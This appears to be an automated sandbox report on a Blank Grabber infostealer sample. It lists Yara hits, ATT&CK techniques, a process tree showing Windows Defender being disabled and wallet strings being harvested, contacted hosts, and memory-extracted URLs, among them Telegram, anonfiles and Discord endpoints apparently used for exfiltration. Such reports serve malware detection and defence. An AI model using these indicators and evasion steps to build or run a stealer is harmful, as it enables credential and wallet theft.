Source: Yara match; File source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7664, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1393387910.000001C12B874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7664, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key, type: DROPPED
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Code function: 2_2_00007FF8E81353DC bind
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Code function: 2_2_00007FF8E8136424 listen
MITRE ATT&CK Matrix (techniques prefixed with a number are those the report tied to matched signatures; the remaining entries are the matrix's default grid)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 11 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 2 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 31 Disable or Modify Tools; 61 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 111 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 151 Security Software Discovery; 2 Process Discovery; 61 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 System Network Configuration Discovery; 1 File and Directory Discovery; 34 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1543368; Sample: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Startdate: 27/10/2024; Architecture: WINDOWS; Score: 100

Process tree recovered from the behavior graph (the number after a process name is the count shown next to it in the graph):

Start
    Contacted: ip-api.com; www.nodejs.org; 8 other IPs or domains
    Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected Blank Grabber; 8 other signatures
    +- SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe (23)
        Dropped: C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32+); 17 other files (none is malicious)
        Signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Removes signatures from Windows Defender
        +- SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe (1)
            Contacted: ip-api.com 208.95.112.1, 49769, 80 (TUT-ASUS, United States)
            Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Removes signatures from Windows Defender
            +- cmd.exe (1)
                Signatures: Uses ipconfig to lookup or modify the Windows network settings; Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender
                +- powershell.exe (23)
                +- conhost.exe
            +- cmd.exe (1)
                Signatures: Removes signatures from Windows Defender
                +- powershell.exe (23)
                    Signatures: Loading BitLocker PowerShell Module
                    +- WmiPrvSE.exe
                +- conhost.exe
                +- MpCmdRun.exe
            +- cmd.exe (1)
                +- powershell.exe (23)
                +- conhost.exe
            +- 3 other processes
                +- bound.exe
                    Contacted: edge-term4-fra2.roblox.com 128.116.123.4, 443, 49792 (ROBLOX-PRODUCTIONUS, United States); www.nodejs.org 104.20.23.46, 443, 49809 (CLOUDFLARENETUS, United States); 2 other IPs or domains
                    +- cmd.exe
                        +- conhost.exe
                        +- ipconfig.exe
                    +- conhost.exe
                    +- WerFault.exe
                +- 5 other processes

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | 53% | ReversingLabs | Win64.Trojan.Generic
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\libcrypto-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\libffi-8.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\libssl-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\python313.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\rar.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pyd | 0% | ReversingLabs |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
https://tools.ietf.org/html/rfc2388#section-4.4 | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://crl.mic | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://httpbin.org/ | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535 | 0% | URL Reputation | safe
http://tools.ietf.org/html/rfc6125#section-6.4.3 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://www.newtonsoft.com/jsonschema | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6 | 0% | URL Reputation | safe
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nodejs.org | 104.20.23.46 | true | false | - | unknown
getsolara.dev | 172.67.203.125 | true | false | - | unknown
edge-term4-fra2.roblox.com | 128.116.123.4 | true | false | - | unknown
www.nodejs.org | 104.20.23.46 | true | false | - | unknown
ip-api.com | 208.95.112.1 | true | true | - | unknown
clientsettings.roblox.com | unknown | unknown | false | - | unknown
blank-8rmnx.in | unknown | unknown | false | - | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://getsolara.dev/asset/discord.json | false | - | unknown
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live | false | - | unknown
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | false | - | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/Blank-c/BlankOBF | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1406140672.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404697501.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404952130.000001DCB6036000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1405277736.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/urllib3/urllib3/issues/29200 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
https://api.telegram.org/bot | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/Blank-c/Blank-Grabberi | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://ncs.roblox.com/upload | bound.exe, 00000011.00000002.1605507236.00000254B6C19000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://www.nodejs.org | bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip | bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C2E000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw | bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://tools.ietf.org/html/rfc2388#section-4.4 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://aka.ms/vs/17/release/vc_redist.x64.exe | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | false | - | unknown
https://api.anonfiles.com/upload | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
https://packaging.python.org/en/latest/specifications/entry-points/#file-format | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v9/users/ | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
http://cacerts.digi | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://github.com/Blank-c/Blank-Grabberr# | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://peps.python.org/pep-0205/ | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1396701791.000001DCB55F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr | false | - | unknown
http://127.0.0.1:6463/rpc?v=1 | bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000B.00000002.1500577512.000001E35B281000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                              http://edge-term4-fra2.roblox.combound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1398382471.000001DCB5623000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://discord.combound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        unknown
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://blank-8RmNx.inSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://github.com/python/cpython/issues/86361.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5D21000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5DAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408120431.000001DCB5E6F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://crl.micpowershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://httpbin.org/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://getsolara.devbound.exe, 00000011.00000002.1605507236.00000254B6B55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://discord.com;http://127.0.0.1:6463/rpc?v=11SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                              unknown
                                                                                                              https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadataSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://127.0.0.1:64632fbound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://github.com/python/importlib_metadata/wiki/Development-MethodologySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB63B4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://tools.ietf.org/html/rfc6125#section-6.4.3SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://getsolara.devbound.exe, 00000011.00000002.1605507236.00000254B6B4A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
